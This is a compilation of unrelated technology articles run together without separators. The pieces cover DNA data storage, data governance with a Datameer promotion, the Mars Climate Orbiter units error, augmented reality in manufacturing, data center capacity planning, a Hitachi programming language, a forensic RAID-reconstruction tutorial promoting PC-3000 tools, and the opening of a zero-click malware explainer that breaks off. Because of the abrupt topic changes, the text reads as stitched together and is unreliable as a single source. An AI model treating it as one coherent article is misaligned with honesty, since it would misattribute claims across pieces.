Two of the biggest challenges in making DNA storage a commercial reality are cost and speed. Some estimates put the cost of encoding data at more than $12,000 per megabyte and $220 for retrieval. However, DNA synthesis and sequencing costs are already decreasing and, given time, will reduce even further to a palatable level.
“The cost of sequencing is decreasing, so now it’s cheap to read DNA,” said Christophe Dessimoz, a professor at the University of Lausanne who is an expert in this area. Synthesis costs remain relatively expensive, he said, although he expects it to decrease over time.
One company determined to beat the odds is Catalog Technologies, a start-up working with Cambridge Consultants to build a machine capable of encoding DNA data at a speed of 1TB per 24 hours. Hammond says the difference with the Catalog model is the way data is encoded into the DNA.
“The traditional approach involves writing the data directly into the DNA and creating the DNA one base at a time. That’s slow and expensive,” he explained. “Compare what Catalog has done to a movable type printing press: They have a bunch of standardized letters—in other words, short small pieces of DNA—and they combine the bits of DNA together in the right order.”
By connecting pre-existing pieces of DNA instead of creating DNA from scratch, Catalog will be able to reduce the number of assembly steps, increasing the speed, reducing energy consumption and ultimately, reducing cost.
Catalog envisions its machine as part of a data archiving service offering. An organization would transfer its data to Catalog, which would input the digital data stream into its machine, process it, and use that information to assemble pieces of DNA. The result is a tube with powder—dry DNA with the organization’s encoded information. When an organization requests access to some of the data, Catalog will take it out of storage, re-suspend it to liquid form and run that liquid through its DNA sequencer. It would then convert it back to digital form and run through the inverse of the original algorithm. The result? The original data, in the original format.
The process is complicated, and Catalog doesn’t expect a commercially available offering for a few years. But Hammond hopes that eventually it will help DNA become a cost-effective, fast, reliable way of storing cold, archival data.
In essence, Dessimoz agrees. Most likely, he says, organizations will have some combination of long-term DNA storage and short-term solid state storage. It's just a matter of time.
Data governance is the management of a variety of different aspects of data outside of the core storage and management of data, including availability, security, use, and trustworthiness. Effective data governance tries to strike a balance between preventing misuse and maintaining regulatory compliance with democratizing data.
While many companies have embraced data governance processes for years, it has taken on a much bigger role in the past 15 years. As organizations expanded the volumes and types of data they captured, governments instituted regulatory controls around data to protect consumers, and the increased threat of breaches or misuse created financial risks for these organizations.
The role of data governance has grown over time, moving beyond controls to helping organizations make more effective use of data. For example, while understanding how certain datasets are used helps prevent misuse, it also helps other teams envision other related ways to effectively use and gain greater value from the data.
In the early days of data governance, most data was centralized putting governance in the domain of the core IT and data management teams. As regulatory controls increased, some organizations made governance the responsibility of the Head of Risk or Chief Risk Officer (CRO). More recently, as the role of the Chief Data Officer (CDO) has expanded, the CDO often owns or shares responsibility for data governance.
Most well-designed governance programs are steered by a committee that combines technical, operational, and business owners. This committee will work together to create the guiding principles for governance within the organization and assess risks. Data stewards are typically the people responsible for carrying out the day to day implementation and enforcement of the policies.
It is important to recognize that data governance is not simply a packaged piece of software. It is a framework that implements policies and processes that are a part of the overall governance program. Underlying software and technologies can provide the tools to help implement the framework, but it is up to the data governance team to put in place the policies and processes that best suit their organization.
A good framework will often include the following principles:
Data security and governance are often intertwined. Most frameworks start and end with determining the access controls and security needs of datasets. This is especially critical in highly regulated industries such as financial services, telecommunications, healthcare, and insurance.
Security is also intertwined with all the other principles in a data governance framework. For example:
Data governance tools come in four general categories:
Datameer provides a deep suite of security and governance features and is intentionally designed NOT to replicate already-in-place governance mechanisms but instead to work with these controls. These capabilities have matured over Datameer's ten years of experience working with large enterprises in highly regulated industries that require deep security and governance.
Cloud and hybrid environments can create security and governance gaps due to capability mismatches between on-premises enterprise and cloud platforms. Datameer's deep security and governance features ensure you get the same robust governance in the cloud that you would expect on-premises.
Datameer also integrates with enterprise and cloud security, offers asset-level controls and encryption on the wire and at-rest. It fully integrates with Snowflake security to protect all the data.
From a governance standpoint, Datameer provides many key capabilities:
In the mid-1990s, NASA began a series of ambitious missions to explore Earth’s close planetary neighbor, Mars. On Dec. 11, 1998, the space agency launched the $193 million Mars Climate Orbiter—the first interplanetary weather satellite and a vital component of the years-long Martian exploration program involving thousands of man hours.
But less than a year later, on Sept. 23, 1999, the Mars Climate Orbiter came to a premature and mysterious demise. It either disintegrated after a too-low entry into the Martian atmosphere, smashing into the surface of the Red Planet, or it spun off on an unknown trajectory.
Months of investigation pointed to an incredibly simple, and almost unbelievable, reason for the mishap. Engineers had designed the orbiter using English units of measurement, while the flight-management team used the more conventional metric system for a key spacecraft operation. The mismatch of units in navigation information led to the craft’s loss.
Simple data, dreadful error.
The loss of the Mars Climate Orbiter presents a strong case for data governance, illustrating the mission-critical nature of systems information. Data uncontrolled and unexamined—ungoverned—can lead to business tribulations ranging from elevated costs to disastrous business failure.
Data governance is key when a company begins to regard its information as a corporate asset. It involves the people and methods required to create a consistent, composite, holistic view of an organization’s accumulated and dynamic information. To govern effectively, organizations are challenged to balance protection with production, essentially weighing effective information access against appropriate data use, across diverse organizations in various geographies. This requires active coordination of complex and interrelated skills, domains and structures.
As guardians, manipulators, evaluators and analyzers of an organization’s data, IT professionals and the companies they serve rely on data governance for three important, yet simple reasons:
- To reconcile the different views of a customer
- To gain confidence in regulatory filings
- To ensure information security
When related companies merge or co-brand, each company comes with its own array of data and, more importantly, data metrics. Inevitably, the information presents dissimilar views of similar content. Likewise, various company entities may offer the same challenges; what R&D refers to as a “thingamabob,” marketing labels a “widget.” Same gadget, different name and, therefore, divergent data.
No IT professional would be surprised by this occurrence. A 2002 survey by The Data Warehousing Institute estimates that businesses in the United States annually lose more than $600 billion in postage, printing and staff time as a result of incorrect customer name and address data. Amazingly, that’s nearly 5 percent of the annual U.S. gross domestic product from something as simple as a wrong address. Data governance yields precision.
The U.S. Securities and Exchange Commission (SEC) mandates that public companies file an accurate view of their business dealings, and it is incumbent upon a company to comply.
In 2005, the SEC stepped in when Instinet and INET ATS were found to have repeatedly provided inaccurate information regarding management of investor orders by their electronic ordering systems. Each company was handed a $2.5 million fine. The SEC recounted that, among other mistakes, the companies’ published data misclassified/miscounted shares, improperly categorized orders and erroneously reported times of transactions. Data debility degrades corporate compliance—sometimes with costly results.
Because they value their information and recognize its power, companies ranging from MasterCard and Wal-Mart to Google and Exxon-Mobil have made data governance a priority. Regarding information as a corporate asset nets operational and capital rewards.
In investigating the loss of the Mars orbiter, a project leader made the case for data governance when he said the team would look at how the data got into the system in English units, how the data was transferred and why the conflicting data wasn’t discovered during the mission.
His assessment: “People make errors. The problem here was not the error. It was the failure of us to look at it end to end and find it.”
Robert Reeg, CTO, is responsible for all computer operations, network engineering, technology architecture, database management, program management, testing/software quality and information security at MasterCard Worldwide.
Characterized by a fusion of technologies that blur the lines between the physical and digital, the Fourth Industrial Revolution is spreading across the manufacturing world. As a component of this revolution, a growing number of suppliers are using augmented reality (AR) to improve operations in workforce training and equipment maintenance.
AR is a technologically enhanced version of reality created by using technology to overlay digital information on an image of something being viewed through a device, such as smart goggles or a smartphone camera. The goggles are often voice-controlled, leaving wearers with both hands free.
Statista estimates the AR market was worth $5.91 billion in 2018, and that it will reach more than $198.7 billion by 2025.(1) The technology naturally has a stronghold in the video games and entertainment sector, but a growing number of manufacturing suppliers, including large automated equipment manufacturers, are utilizing the technology to provide their employees and customers with virtual hands-on instruction for operating machinery, troubleshooting and conducting repairs.
In fact, 10 percent of the Fortune 500 companies have already begun exploring shopping and operation applications for AR.(2) Gartner predicts that by 2020, 20 percent of large enterprises will evaluate and adopt augmented reality, virtual reality and mixed reality solutions as part of their digital transformation strategy.
Training and Maintenance
The “model-based digital twin” is an increasingly popular use for AR technology in manufacturing. The digital twin is a clone of the physical asset, providing a dynamic, self-teaching model to optimize performance in conjunction with an Industrial Internet of Things (IIoT) platform. The combination of machine learning and physics-based modeling enables engineers to create entire AR experiences that show technicians how to service factory floor machines. Using the digital twin, a technician can repair a faulty device in record time and with greater accuracy.(3)
In-person training can be expensive and requires that the equipment be readily available for student training. Companies can use AR tools to provide real-time visual guidance and can connect students with teachers without the cost and logistics of getting everyone in the same room. For example, Bosch Rexroth, a global provider of power units and controls used in manufacturing, uses an AR-enhanced visualization called Hägglunds InSight Live to demonstrate the design and capabilities of its smart, connected CytroPac hydraulic power unit.
The AR application allows customers to see 3-D representations of the unit’s internal pump and cooling options in multiple configurations and how the subsystems fit together.(4) Technicians can also take advantage of smart goggles’ video and photo recording abilities to keep track of progress and keep tabs on errors. Goggles can capture hands-free photos in seconds, and those images can be submitted to off-site teams for troubleshooting help.
Incorporating AR into industrial processes has proven to boost worker productivity. For example, GE Healthcare warehouse workers use Skylight, an industrial augmented reality application platform from Upskill, to kit and complete pick-list orders up to 46 percent faster.(5) Upskill provides augmented reality software for the industrial workforce, and it boasts an average worker performance boost of 32 percent for Skylight customers.
In GE’s application, Skylight connects to warehouse systems to get real-time information on an item location by connecting to smart warehouse systems. It then gives workers easy-to-read instructions for where to locate items throughout the building. The previously paper-based process, where workers flipped through printed orders to locate parts and waded through depleted stock locations, is now efficient and digitized.
In another use case, Lockheed Martin used Microsoft HoloLens headsets to view holographic renderings of an aircraft’s parts and the instructions on how to assemble them. Microsoft HoloLens offers mixed reality solutions to increase communication and improve efficiency. The AR technology reduced assembly time by 30 percent, and digitizing the workflow helped Lockheed Martin increase engineering efficiency to 96 percent.(6)
Evaluating the Investment
These case studies make a strong argument for AR’s ability to improve manufacturing operations, but manufacturers still may wonder if augmented reality is worth the investment. Companies considering investing in AR should be strategic, approaching the opportunity by establishing the bottom-line value first. Approaching digital with a clear vision and a phased roadmap, and with a focused ecosystem of technology partners will help maximize the return on investment in new technology.
Workforce training and equipment maintenance applications for AR have the potential to help companies get ahead of the capabilities gap and build the culture to sustain that lead.
Bryan Griffen is the director, industry services at PMMI, The Association for Packaging and Processing Technologies.
Data Center Capacity Planning: Definition, Benefits, and Solutions
Published on June 4, 2020
What is Data Center Capacity Planning?
Plans are a part of daily life. In every industry, decisions have to be made as a natural part of operating. Leaders, however, are uniquely positioned not just to make decisions but to enable their teams to act according to strategic direction.
Data centers are no exception to this reality. Plans and strategic direction can make tangible differences in not only the data center’s functionality and overall performance but also to the end consumer.
This is why data center capacity planning is crucial.
What is data center capacity planning?
Data center capacity planning is a type of planning which assesses the data center to ensure that the center’s workload can be adequately met.
Practically, data center capacity planning involves a process of assessing the data center—from computing resources, cooling capacity, power load, and more—and then forming and enacting a plan to make sure that all workload demands can be met and even improved upon. As an end result, this planning can reveal areas of improvement and potential dangers which allow leadership to enact plans for data centers to function most optimally.
Why is data center capacity planning important?
Planning can generally serve to enhance the operations of any data center, but its importance is being underscored in light of the shifting demands on both physical and virtual assets. With environmental concerns as well as financial pressures, more attention is turning to planning that prepares for the future while avoiding the consequences of a lack of planning: ill-used or under-utilized assets and wasted financial resources.
Not only does this shifting landscape reveal the need for data center capacity planning, but also such critical analysis of server hardware resources and more has multifaceted benefits to businesses and consumers.
It can give insight into power and cooling to enable optimal function for the given workload as well as attending to network and storage capacity. Careful planning can make sure that mistakes within performance are acknowledged and avoided while ensuring that mission-critical functions are not only safeguarded but also enhanced.
Further, data center capacity planning can eliminate waste and idle assets while decreasing the likelihood of debilitating outages that interrupt business operations.
How can data centers improve their capacity planning?
Basic tools such as spreadsheets were traditionally the most essential assets for planning, but options such as 3D renderings, virtualization, cloud computing, and even outsourcing have since emerged.
One tool stands out as exponentially beneficial: many operators have explored the myriad benefits of data center infrastructure management (DCIM) software, which offers unique insight into, and solutions for, capacity planning.
Such tools aren’t the only resource available to help with capacity planning; often the communication between facilities, IT, and additional business decision-makers and leaders must be strengthened in order to continually trouble-shoot, forecast, and adapt.
All in all, selecting tools, enhancing communication, and engaging with data center capacity planning can greatly benefit the data center’s footprint, power consumption, cooling capacity, performance times, load calculations and more.
The major drawback of highly automated manufacturing plants is that they are so capital-intensive that they cost their implementers an arm and a leg to service the debt raised to finance their construction. That means that they have to be kept running at peak output three shifts a day six or seven days a week in order to earn their keep. And that, in turn means that if the market for the products being turned out turns sour, it is vital to be able to reprogram all the robots and control computers to make something else in very short order indeed. The only widely-known manufacturing language designed to address the problem so far is IBM’s A Manufacturing Language, AML, which is derived from Pascal. But Hitachi has been working on its own manufacturing language for some time, and all it now needs is a name. Hitachi says that compared with C or Fortran, its unnamed language requires over 90% fewer lines of code to achieve the same ends. Derived from database management software technology, the new slimline language has only between 30 and 40 commands. Although designed primarily to run on Hitachi’s HIDIC line of factory automation computers, it can also run on mainframes.
by Alexander Leonenko
Today we would like to talk about RAID arrays with lost configuration and how to extract evidential data from them. Let’s start with understanding what a RAID is in the first place.
RAID. What is it?
RAID is a Redundant Array of Independent Drives. The system shows it as a virtual storage device with block access. In essence, RAID is a virtual drive.
The purpose of assembling RAID is the creation of storage with higher access speed, larger capacity and greater reliability.
Why do people use RAID? Domestic users may assemble arrays to create backups or to store their personal archive of photos and documents, along with their home multimedia library (movies, music and so on). Companies use RAID as data storage on the server. This can be a common (shared) document storage, storage for backups, databases, accounting data and the like.
In short, RAID is high-capacity storage for the most valuable data.
So how to deal with it?
There are two ways to make an image of a RAID.
The first one is to get an image on the machine under examination.
The main advantage of this method is that there is no need to understand how the array is arranged. However, this method has many drawbacks and the main one is that doing something on the running examined machine is a big forensic taboo. So, what options are available?
- We may run the server and launch some copying software from a USB flash drive or a Live CD; though the OS may change something during the work, which is obviously bad.
- It is possible to boot the OS from a CD or a flash drive and launch the software – but there is no guarantee that it will work because, for example, many arrays are software-based (including the widespread NAS devices), so to see the RAID you need to run the appropriate software. Also, with this method we will not be able to access areas of the disks that are not used in the RAID.
So, in general, we can’t be sure that the data will remain unchanged.
The second approach is to make a forensic image of each drive separately, and then assemble the array in read-only mode.
This is the only method that ensures the integrity of the data, and also gives us the opportunity to research all areas of the HDD (RAID may very well not use the entire disk from beginning to end, but only some of its internal segments. Thus, there may be unused areas that can store hidden data).
The main disadvantage of this method is the need to assemble the array, namely the need to determine its configuration. So, to do everything correctly, we need to define the configuration.
To assemble the RAID, you have to determine:
- which drives are used: sometimes not all disks are used (there may be spare or excess ones that are used for “system”), sometimes there are not enough disks (one drive might be broken or might have been thrown away, but the array still functions due to redundancy) and so on.
- the order of drives in the array. Sometimes this reflects the order in which the disks were placed inside the computer, but do not bet on this.
- the RAID level and the algorithm (if it does have one)
- the block size used for striping
- the start and finish LBA used in RAID (drives are not necessarily used from 0 to MaxLBA)
- the delay (stripe repeat factor), a common feature of Compaq and HP arrays (HP bought Compaq).
Why can the definition of parameters be a problem? The answer is simple – the number of all possible configurations is huge! The drive order alone gives us two dozen variants for four drives, more than a hundred for five drives and thousands for seven drives. And we still have many other parameters that multiply the number of possible configurations.
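The scale of that search space is easy to verify: drive order alone is a factorial, and every independent parameter multiplies it. A quick sketch (the candidate counts for levels, block sizes, start LBAs and delays below are illustrative assumptions, not fixed values):

```python
from math import factorial

def order_variants(n_drives: int) -> int:
    """Drive orderings alone: n! possibilities."""
    return factorial(n_drives)

# The figures quoted above:
assert order_variants(4) == 24      # "two dozen variants for four drives"
assert order_variants(5) == 120     # "more than a hundred" for five
assert order_variants(7) == 5040    # "thousands" for seven

def total_configurations(n_drives, levels, block_sizes, start_lbas, delays):
    """Rough upper bound: every independent parameter multiplies the space."""
    return order_variants(n_drives) * levels * block_sizes * start_lbas * delays

# Assumed candidate counts: 4 RAID 5 rotation algorithms, 6 common block
# sizes, 3 plausible start LBAs, 2 delay values.
print(total_configurations(7, 4, 6, 3, 2))   # 725760 configurations to test
```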
Of course, there are simple cases, for example:
- software arrays with a well known RAID-metadata format
- a small number of members and simple levels (eg Stripe or Mirror)
All other cases can be really hard for an inexperienced user. Besides, in real life you have to deal with factors that make it extra-complex:
- RAID metadata is missing, corrupted, or incorrect (left over from the “previous” disk life, or is the result of a reinitialization of the array)
- the file system on RAID is corrupted and it is very difficult to use its metadata to define a configuration (the virus or the malefactor could damage FS)
- some members can be unused – hot-spare disks or system-disks.
- another common issue with the members – you may get a bunch of drives from many different arrays. So you will need to understand which disk came from which array first
- the next problem – arrays with exotic configurations, for example, an unusual shift from the beginning of the disk or delay, or whatever else, may be used.
- also, it is often necessary to restore data after a destructive rebuild – the operation of rebuilding an array with incorrect parameters that results in data being damaged (the rebuild itself may be the cause of the investigation)
Assembling RAID during the digital forensic examination is necessary, even though this task can be very, very difficult.
Keys to success
What can help us to cope with all the difficulties? A joint combination of several ideas and approaches:
- the 1st one is a file carving (in Data Extractor it is a “RAW Recovery” mode) with the ability to determine the size of the integer part of the files
- the 2nd one is the statistical processing of the results found by the file carver. Individual files can give the wrong picture, but their set shows a very good result
- the 3rd one is the ability to quickly check an assumption – for this we need a tool that performs all the transformations associated with RAID translation on the fly; in other words, we need on-the-fly RAID reconstruction, because building a new image for every assumption check takes far too much time
Next, we will look at all these things in more detail.
File Carving basics
File Carving (“RAW Recovery” mode in PC-3000) is a way to find the headers of files using knowledge of file formats, without information from the file system. The simplest and most commonly used approach is to search for the signature of the beginning of the file. For example, PNG images begin with the fixed signature bytes \x89PNG at the very start of the file. For other file types, the signatures are, of course, different.
Knowledge of file formats allows us not only to find the headers but also to estimate the integer part of the file from below.
For example, PNG files consist of a sequence of chunks, each chunk having a signature, size, and checksum, i.e. we can verify it reliably enough. This means that if the file is not damaged or fragmented, we can check it from beginning to end and say that it is “whole” and that its size is N bytes.
If the file is fragmented or a part of it has been rewritten, then we can say that here is the title and the first few pieces are whole. They occupy K bytes. And somewhere after that, there is damage. It can be K+1 byte or K+100 byte – unknown. But the first K bytes are exactly whole.
For different types of files, the ability to check the integer part and the accuracy of this check are very different. Sometimes it is possible to check the whole file, as in this png example. But sometimes we can check only a few hundred bytes from the beginning, for example for BMP files, regardless whether it is whole or damaged.
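As a rough illustration of both steps, signature search and integer-part estimation, here is a minimal PNG carver sketch. The PNG format makes verification easy: after the fixed 8-byte signature, the file is a sequence of chunks, each carrying a big-endian length, a type, and a CRC-32 computed over the type and data. Real carvers such as the one in PC-3000 support many formats and are far more robust; the function names here are purely illustrative:

```python
import struct, zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_intact_prefix(data: bytes, start: int) -> int:
    """Return the number of verifiably intact bytes of a PNG found at `start`
    (signature plus every chunk whose CRC checks out), or 0 if no PNG is there."""
    if data[start:start + 8] != PNG_SIG:
        return 0
    pos = start + 8
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc) < 4:
            break                      # chunk runs past the end: truncated
        if zlib.crc32(ctype + body) != struct.unpack(">I", crc)[0]:
            break                      # checksum mismatch: damage starts here
        pos += 12 + length
        if ctype == b"IEND":
            break                      # final chunk reached: whole file verified
    return pos - start

def carve_png_headers(data: bytes):
    """Find every PNG header and the size of its intact prefix."""
    hits, idx = [], data.find(PNG_SIG)
    while idx != -1:
        hits.append((idx, png_intact_prefix(data, idx)))
        idx = data.find(PNG_SIG, idx + 1)
    return hits
```

A fragmented or overwritten file fails the CRC check partway through, so the carver still reports the exact size of the intact leading part, which is all the statistics below need.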
Ability to find headers and check integer parts for many different file types is a unique feature of PC-3000 RAID Systems that no other tool has.
File carving on a RAID member
Let’s look at a simple RAID 5 Left Synchronous (LS) which consists of three members. If you have ever tried to recover data from RAID, this configuration should be familiar to you:
And now let’s look at one of its members, for example, Member A:
This RAID Table describes the repeating rule of translation. The picture shows just two full repeats and the beginning of the third. Since it is a RAID member, it stores the data blocks and the redundancy block – XOR. Data blocks do not go one after the other like 0, 1, 2, 3, …, they have gaps – 0, 3, 6, etc. because other blocks are stored on other members.
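The translation rule illustrated above can be generated with a short script. This is only a sketch of the common left-synchronous rotation (parity moves one disk to the left each row, and data numbering restarts just after the parity block); the function names are ours, not PC-3000’s:

```python
def raid5_ls_layout(n_disks: int, rows: int):
    """Translation table of a RAID 5 Left Synchronous array: each row is a
    list holding either a data-block number or 'XOR' per disk."""
    table, block = [], 0
    for row in range(rows):
        parity = (n_disks - 1) - (row % n_disks)   # parity rotates right-to-left
        r = ["XOR"] * n_disks
        for i in range(n_disks - 1):               # data starts right after parity
            disk = (parity + 1 + i) % n_disks
            r[disk] = block
            block += 1
        table.append(r)
    return table

def xor_blocks(blocks):
    """Parity is the byte-wise XOR of a row's data blocks, so any single lost
    block can be rebuilt by XOR-ing the parity with the surviving blocks."""
    out = bytearray(len(blocks[0]))
    for b in blocks:
        for i, byte in enumerate(b):
            out[i] ^= byte
    return bytes(out)

layout = raid5_ls_layout(3, 3)
# Member A (disk 0) carries blocks 0 and 3, then parity: the 0, 3, 6... gaps.
print([row[0] for row in layout])   # → [0, 3, 'XOR']

# Redundancy demo: a "lost" block is recovered from the other two.
d1, d2 = b"\x10\x20", b"\x0f\x01"
parity = xor_blocks([d1, d2])
assert xor_blocks([parity, d2]) == d1
```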
Now let’s talk about how the file carving works on the RAID members.
The member stores the individual blocks of the array, thus the integer part of the file is limited by the size of the block.
- the file may start and end somewhere inside the data block
- if the file is large, it will be interrupted at the end of the block since the other part of the file is stored on another member
Here we see situations the probability of which is extremely small:
The integer part of the file on a RAID member:
- cannot move from block to block
- cannot be inside the XOR block
Such situations exist of course, but their number is much smaller than “normal” ones (as in the previous image).
The conclusion is we can find the integer parts of the files inside the individual data blocks only.
Statistical processing of carved data
The rule of data translation in RAID is periodic. In our case, every two blocks out of three are actually data blocks, and the last one is XOR:
If we just sum up how many integer parts are in each sector of each block, we will see something like this:
- there are a lot of integer parts of files inside the data blocks
- there is nothing inside XOR
- you can see the border between the blocks because the file does not cross the block border
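The accumulation itself is straightforward: fold every carved hit into a single translation period and count intact sectors per offset. A minimal sketch, assuming the carver reports (start LBA, intact sectors) pairs:

```python
def carve_histogram(hits, block_size, n_disks, delay=1):
    """Fold carved-file hits into one translation period.

    hits: iterable of (start_lba, intact_sectors) pairs from the carver.
    Returns a per-sector-offset count of intact file data; offsets that stay
    near zero across many hits are parity or service blocks."""
    period = block_size * n_disks * delay
    hist = [0] * period
    for start_lba, intact in hits:
        for s in range(intact):
            hist[(start_lba + s) % period] += 1
    return hist

# Synthetic member of a 3-disk RAID 5 with a 4-sector block size: files land
# only in the two data blocks of each 12-sector period, never in the XOR block.
hits = [(0, 4), (16, 3), (24, 2)]
hist = carve_histogram(hits, block_size=4, n_disks=3)
assert sum(hist[8:12]) == 0   # the third block stays "empty" → XOR
```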
Let’s check the theory in practice. Only PC-3000 RAID Systems have the ability to statistically process carved data and graphically demonstrate the results. In this screenshot, you can see the histogram from the software which was obtained during solving the real case:
The picture is very similar to the previous one. The data blocks and the “empty” XOR block are clearly visible. The red lines show the places where zero and non-zero values are located next to each other. They help to see the potential block borders.
And here are three drives at once:
We can see that the XOR block (the “empty” one) is located in different places on different members, as it should be with RAID 5. The block size equals 128 sectors, and it’s shown on the histogram (just do not forget that the LBAs increase left-right, not top-down. This is a more convenient way to view information on widescreen monitors).
Histogram for different periods
The period size is the block size multiplied by the number of disks and by the delay (if one is used). So what if we make a mistake? What will we get? Here are real examples of how the histogram of the same disk looks for different periods:
- in the first case, we made a mistake with the block size – we set it to half the real value and got a period half as long, so it is not clear that this is RAID 5
- the second picture – all the parameters are correct, it is clear that this is RAID 5
- and the last picture – we chose the wrong number of members – four instead of three – and again we see that the histogram is “broken.”
So, if we build statistics with the wrong period, we will see the wrong histogram.
This can be used as a quick histogram test: calculate the period and look at the histogram. If empty areas are visible (as in the XOR blocks) – the parameters are set correctly; if not, this may be a mistake or the configuration doesn’t have any XOR, RS or HS blocks. In real life cases, the histogram is built instantly or in a few seconds. So, it is really a quick test.
Examples of different configurations
Now let’s look into some patterns for different configurations. All histograms in the pictures are based on real cases.
RAID 5, 8 drives, block size 128 sectors
Here you may see the RAID 5 configuration built on 8 drives with 128-sector block size:
- Why RAID 5? Because it has only one “empty” block – XOR
- Why 8 members? Because the period consists of 8 blocks
- Besides, the 128-sector block size is clearly visible by the distance between the red auxiliary lines
Also, you can see some “noise” here in the XOR block. A few files were found there, which is not impossible. However, there are significantly fewer of them than in the data blocks.
RAID 6 (or 5EE), 6 drives, block size 256 sectors, Start LBA is shifted
And this is the RAID 6 or 5EE which consists of six drives:
- Why RAID 6? – because there are two “empty” blocks. One is XOR, and the other is Reed-Solomon (or a Hot-Spare block, if it is 5EE)
- 6 drives because there are 6 blocks in the period
- the length of one “peak” is 256 sectors, this is the block size
In this picture, you can see that there are two parts of the block at the beginning and at the end:
This happens because RAID does not start from 0 as in previous cases, it has some shift. The size of the blue part at the beginning is 64 sectors (there is a hint above the red line). This means that the RAID begins with some LBA, which should be like this: N * BlockSize + 64, N = 0, 1, 2, … . In our case it was 1088 (= 4*256 + 64) – typical start LBA for some HP and Compaq arrays.
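The set of start LBA candidates implied by such a leading fragment is small and can be enumerated directly; the block size and fragment length below are the values read off the histogram:

```python
block_size, fragment = 256, 64            # sizes observed on the histogram
candidates = [n * block_size + fragment for n in range(8)]
print(candidates[:5])                     # → [64, 320, 576, 832, 1088]
assert candidates[4] == 1088              # 4*256 + 64, the value from this case
```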
RAID 5, 4 drives, delay 16, block size 128 sectors
Here you may see the RAID 5 with a delay value of 16:
How do we determine this? Here you can see that the rightmost ¼ is an area with service data. There are a lot of red lines – this is the “noise” created by the small files found in the XOR blocks. In total, we had four drives, so we suggest that this is a RAID 5 which consists of four drives. (A similar histogram can be seen for a RAID 6 which consists of eight drives.) The remaining areas are filled with data, but it is clearly seen that there are many blocks inside one area. Let’s zoom in on one of the areas.
Now you can see that there are 16 blocks inside one area:
This means that the delay is 16 and the block size is 128 sectors.
RAID 0 (or 10 or 1E), block size 128 sectors
And here is an example of RAID 0:
However, a RAID 10 or 1E – or another level, if we didn’t determine the right period – will look exactly the same. If you work with this configuration, you should first check whether a RAID 5 or RAID 6 histogram fits; only then can we say that it is a 0, 10 or 1E. These levels have no XOR, Reed-Solomon or HS blocks, so we don’t see any “empty” blocks. Besides, we cannot say how many disks are in the RAID, because we see similar patterns for any number of drives.
JBOD or non-RAID drive
Now see what the histogram for JBOD or just a non-RAID drive looks like. You can see that there are no blocks at all:
One drive is unused and one drive is lost
Unused drives are drives that do not belong to the specific RAID array. This could be spare drives, or drives intended to store the OS data.
On the picture you can see that there are four drives that belong to RAID 5, made from five drives with 512-sector block size. And the last one is a stranger. The histogram of this drive differs from all the other drives. Conclusion: the last drive is unused.
We have only four members out of five, so one member is lost.
The same idea goes for drives from different arrays – their histograms will differ.
As such, we see that each RAID level has a distinctive histogram, which can say a lot about the configuration and can even be called its “fingerprint”.
What can we get from a histogram?
The histogram alone gives us a lot of information about the array:
- Block size
- RAID level
- Members count
- Set of possible start LBAs
- Lost and unused drives
But what about the drive order?
Here is an example of RAID 5 which consists of five members and the histograms for all of them. In your opinion, how many drive orders are possible?
Histograms for all drives allow us to set the XOR diagonal. In total, we have four algorithms used in RAID 5. And for each algorithm, we can specify the exact order using this diagonal. PC-3000 RAID Systems have a lot of approaches for how to find the right option and how to check it. We will not go into detail as this is a topic for a separate article. But, in short, the easiest way is to try all four options.
To do this you need to be able to build the RAID on the fly and view various configurations instead of making an image for each one. PC-3000 RAID Systems have an ability to quickly change RAID parameters and immediately observe the result. So it will take less than a minute to go through four configurations.
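That brute-force pass can be sketched in a few lines. The rotation definitions below follow the usual left/right, symmetric/asymmetric naming conventions, and the boot-signature test on virtual sector 0 is a deliberately naive stand-in for the much richer checks a real tool performs; note that sector 0 alone cannot distinguish every configuration, which is exactly why the histogram comes first:

```python
from itertools import permutations

ALGOS = ("left-asym", "left-sym", "right-asym", "right-sym")

def stripe_map(algo: str, n: int, row: int):
    """Return (parity_disk, data disks in block order) for one stripe row."""
    left = algo.startswith("left")
    sym = "asym" not in algo
    p = (n - 1) - (row % n) if left else row % n
    if sym:   # symmetric/synchronous: data numbering starts right after parity
        data = [(p + 1 + i) % n for i in range(n - 1)]
    else:     # asymmetric: data fills disks left to right, skipping parity
        data = [d for d in range(n) if d != p]
    return p, data

def virtual_sector(members, order, algo, block, lba):
    """Read one 512-byte virtual sector under a candidate configuration."""
    n = len(order)
    stripe, sec = divmod(lba, block)       # virtual block and offset inside it
    row, col = divmod(stripe, n - 1)       # stripe row and data-block column
    _, data = stripe_map(algo, n, row)
    disk = order[data[col]]
    off = (row * block + sec) * 512
    return members[disk][off:off + 512]

def find_config(members, block):
    """Yield every (order, algorithm) whose virtual sector 0 ends in 0x55AA."""
    for order in permutations(range(len(members))):
        for algo in ALGOS:
            if virtual_sector(members, order, algo, block, 0)[510:512] == b"\x55\xaa":
                yield order, algo
```

In practice `members` would be the forensic images of the drives loaded as bytes, and the acceptance test would validate real filesystem structures rather than a single signature.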
The same situation is for RAID 6 and 5EE, but there are a few more options: for each algorithm you need to choose which block – XOR or RS – goes first.
To sum up, the proposed approach of using the statistical processing of file carving results – aka histograms – reduces millions of choices into a few possible ones. In other words, it makes complex RAID data recovery issues simple!
About The Author
Alexander Leonenko is a Software Developer and RAID Data Recovery Instructor at ACE Lab.
ACE Lab is internationally recognized as an innovator in the development of cutting-edge solutions for recovering data and evidence from storage devices such as HDDs, SSDs, flash drives, and RAID arrays. ACE Lab has set the benchmark for professional data recovery and has remained the proven leader in the field for 27 years since its foundation in 1992. Data recovery engineers and digital forensics experts from over 117 countries trust the PC-3000 solutions as the most comprehensive and reliable professional data recovery tools.
What is zero-click malware, and how do zero-click attacks work?
In recent years, zero-click attacks have occasionally made their way into the spotlight. As the name suggests, zero-click attacks require no action from the victim – meaning that even the most advanced users can fall prey to serious cyber hacks and spyware tools.
Zero-click attacks are typically highly targeted and use sophisticated tactics. They can have devastating consequences without the victim even knowing that something is wrong in the background. The terms ‘zero-click attacks’ and ‘zero-click exploits’ are often used interchangeably. They are sometimes also called interaction-less or fully remote attacks.
What is zero-click malware?
Traditionally, spying software relies on convincing the targeted person to click on a compromised link or file to install itself on their phone, tablet, or computer. However, with a zero-click attack, the software can be installed on a device without the victim clicking on any link. As a result, zero-click malware or no-click malware is much more dangerous.
